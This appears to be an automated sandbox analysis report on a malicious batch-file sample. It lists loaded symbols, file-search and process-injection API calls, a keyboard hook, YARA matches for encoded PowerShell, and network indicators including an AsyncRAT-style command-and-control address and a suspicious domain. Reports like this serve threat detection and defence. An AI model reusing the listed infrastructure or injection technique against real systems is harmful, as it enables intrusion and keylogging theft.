Source: Binary string: 7\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbpl source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdbx*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40D894 FindFirstFileExW,17_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC43D894 FindFirstFileExW,17_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC43DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00000253FC43DA18
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF36D894 FindFirstFileExW,18_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF36DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000002A5AF36DA18
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD2D894 FindFirstFileExW,37_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EBDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EBD894 FindFirstFileExW,38_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EED894 FindFirstFileExW,38_2_0000020175EED894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165ED894 FindFirstFileExW,39_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D01661D894 FindFirstFileExW,39_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D01661DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_000002D01661DA18

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.6:59172
Source: global trafficTCP traffic: 192.168.2.6:59172 -> 154.216.20.132:6969
Source: Joe Sandbox ViewIP Address: 147.135.36.89 147.135.36.89
Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: ipwho.is
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: azure-winsecure.com
Source: global trafficDNS traffic detected: DNS query: ipwho.is
Source: Microsoft-Windows-LiveId%4Operational.evtx.49.drString found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000028.00000000.2769648555.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000019.00000002.3432949177.0000021404730000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co.1mmi
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.8.drString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A5B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 59173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59173
Source: unknownHTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.6:59173 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Installs a global keyboard hook
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 6444, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Found large BAT file
Source: rbx-CO2.batStatic file information: 5214429
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EE0C8 NtUnmapViewOfSection,36_2_00007FFD343EE0C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EE122 NtSetContextThread,36_2_00007FFD343EE122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EE142 NtResumeThread,36_2_00007FFD343EE142
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EE0FA NtWriteVirtualMemory,36_2_00007FFD343EE0FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EE0A8 NtUnmapViewOfSection,36_2_00007FFD343EE0A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343F0C7D NtWriteVirtualMemory,36_2_00007FFD343F0C7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EE098 NtUnmapViewOfSection,36_2_00007FFD343EE098
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EE132 NtSetContextThread,36_2_00007FFD343EE132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343F0A5E NtUnmapViewOfSection,36_2_00007FFD343F0A5E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343F0F40 NtSetContextThread,36_2_00007FFD343F0F40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343F1004 NtResumeThread,36_2_00007FFD343F1004
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,38_2_0000000140001868
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,39_2_000002D0165E2C80
